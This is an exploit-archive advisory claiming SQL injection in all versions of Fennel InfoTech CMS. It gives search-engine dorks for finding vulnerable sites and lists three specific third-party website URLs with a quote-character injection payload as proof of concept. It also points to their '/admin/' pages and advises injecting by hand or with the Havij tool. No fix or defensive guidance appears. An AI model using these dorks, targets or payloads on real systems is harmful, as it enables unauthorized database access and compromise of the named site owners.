facebook facebook twitter rss

Fennel InfoTech CMS All Version Sql-Injection

Author: Novita Security Team , Published: 13-04-2015
########################################
# Exploit Title: Fennel InfoTech CMS All Version Sql-Injection
# Google Dork: "Designed by: Fennel Infotech" , intext:"Designed by: Fennel Infotech" inurl:"id="
# Date: 3/23/2015
# Exploit Author: Novita Security Team
# Vendor Homepage: http://fennelinfotech.com/
# Software Link: N/A
# Version: All Versions
# Tested on: Kali , Windows
# CVE : N/A
# Email: xodiak.blackhat@gmail.com
########################################
# Sql Injection In Fenell Info Tech CMSes Created Beacuse CMSes Are Custom We Dont Have A Defualt PHP File Like term.php?id=
#
# So We Must Use Dorks To Find The Targets :)
#
#
#Poc Of VulnerAbility:
#
# http://klgshare.in/service-detail.php?id=9%27
# http://www.jewellerytaglabel.com/tags_details.php?id=63%27
# http://www.touchofhopefoundation.org/sub.php?id=36%27
#
#
#
#
######################
# [Default Admin Page]
# You Should Add '/admin/' at the end of the URL
# Inject manullay or use havij!
######################
# Discovered by : Novita Security Team
######################
# Greetz :
# RM_MR , Ali.Yar , Advocate ,Lizard.Squad
# MR.B3NY , Secur!ty , sci3nt15t, Abzari,HamoonPars,SeravoBlackHat, and All Novitasec.com Members
#######################################################################

Like us on Facebook :